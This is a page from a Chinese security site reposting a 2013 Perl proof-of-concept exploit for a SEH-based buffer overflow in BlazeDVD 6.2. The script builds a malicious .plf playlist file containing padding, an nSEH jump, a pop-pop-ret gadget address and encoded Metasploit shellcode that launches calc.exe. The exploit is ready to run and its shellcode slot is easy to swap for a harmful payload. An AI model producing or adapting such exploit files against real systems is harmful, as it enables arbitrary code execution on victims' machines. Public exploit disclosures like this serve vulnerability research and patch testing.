首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlazeDVD 6.2 (.plf) - Buffer Overflow (SEH)
来源:@SecuritySift 作者:Czumak 发布时间:2013-10-29  
#!/usr/bin/perl
  
#########################################################################################
# Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH)
# Date: 10-28-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: BlazeDVD 6.2
# Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe
# Version: 6.2.0.0
# Tested On: Windows XP SP3
# To exploit, simply open blazesploit.plf file 
#########################################################################################
  
my $buffsize = 10000; # sets buffer size for consistent sized payload
my $junk = "\x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data
my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
my $seh = pack('V',0x6033aa41); # overwrite seh w/ pop ecx pop ecx ret 
                # ASLR: False, Rebase: False, SafeSEH: False, OS: False
                # \Program Files\BlazeVideo\BlazeDVD 6.1\Configuration.dll
  
my $nops = "\x90" x 20; # pad shellcode 
  
# Calc.exe payload [size 461] -- Mind the encoding!
# msfpayload windows/exec CMD=calc.exe R | 
# msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
my $shell = "\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35" .
"\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e" .
"\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63" .
"\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63" .
"\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65" .
"\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68" .
"\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42" .
"\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55" .
"\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51" .
"\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47" .
"\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55" .
"\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75" .
"\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34" .
"\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65" .
"\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d" .
"\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62" .
"\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37" .
"\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c" .
"\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31" .
"\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53" .
"\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55" .
"\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56" .
"\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49" .
"\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59" .
"\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45" .
"\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36" .
"\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77" .
"\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33" .
"\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41";
  
my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble the sploit
my $fill = "\x43" x ($buffsize - (length($sploit))); # create buffer fill 
my $buffer = $sploit.$fill; # assemble final buffer
  
# write the exploit buffer to file
my $file = "blazesploit.plf";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($buffer) . "\n";

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VideoCharge Studio 2.12.3.685
·Netgear ReadyNAS Remote Comman
·Open Flash Chart 2 Arbitrary F
·WatchGuard Firewall XTM 11.7.4
·FortKnox Personal Firewall 9.0
·WatchGuard Firewall XTM 11.7.4
·Photodex ProShow Producer 5.0.
·Apache / PHP 5.x Remote Code E
·Symantec Workspace Streaming 7
·sup Remote Command Execution
·Joomla Component com_maianmedi
·Apache / PHP Remote Command Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved